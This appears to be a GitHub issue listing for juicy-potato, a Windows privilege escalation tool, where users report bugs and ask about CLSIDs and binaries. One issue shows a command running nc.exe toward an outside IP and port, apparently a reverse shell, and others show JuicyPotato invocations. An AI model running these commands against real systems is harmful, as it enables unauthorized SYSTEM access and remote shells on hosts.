juicy-potato icon indicating copy to clipboard operation
juicy-potato copied to clipboard

A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\SYSTEM.

Results 12 juicy-potato issues
Sort by recently updated
recently updated
newest added

after everything runs is doesnt executes the file i give ./juicypotato.exe -l 1234 -p C:\Users\Destitute\appdata\local\temp\nc.exe -a "cmd.exe 10.10.18.93 9005" -t * -c '{E48EDA45-43C6-48e0-9323-A7B2067D9CD5}' Testing {7D096C5F-AC08-4F1F-BEB7-5C22C517CE39} 1234 ...... [+] authresult 0...

Hi This adds the PowerShell version to search the CLSID. Best, Emanuel

We can add a CLSID list for `Windows Server 2019` too from https://github.com/antonioCoco/RemotePotato0#clsid-list

Hi, I am trying to run the tool on a Windows 10 Enterprise 1809. I opened a terminal and used psexec64 to run a console under the nt authority\local service...

unexploitable windows

Please provide also pre-compiled JuicyPotato x86

Hi, I am having an issue when specifying the CLSID: ``` C:\Users\asdf\Desktop> ./JuicyPotato.exe -l 1337 -z -t * -c {90F18417-F0F1-484E-9D3C-59DCEEE5DBD8} Wrong Argument: - JuicyPotato v0.1 Mandatory args: -t createprocess call:...

Is it possible to put the juici potato exploit on ps1 to be able to run it in powershell?

Using JP over a commandline-only session (like WinRM) means that, for example, simply spawning a new shell is unhelpful because it can't be accessed. Spawning it in the current shell...

``` C:\Users\ben\Documents>powershell ./GetCLSID.ps1 powershell ./GetCLSID.ps1 Name Used (GB) Free (GB) Provider Root ---- --------- --------- -------- ---- HKCR Registry HKEY_CLASSES_ROOT Select : The property cannot be processed because the property...

Binaries on https://ci.appveyor.com/project/ohpe/juicy-potato/build/artifacts cannot be downloaded because of the retention policy. Could you look into making binaries available. Or just publish the latest release here under Releases.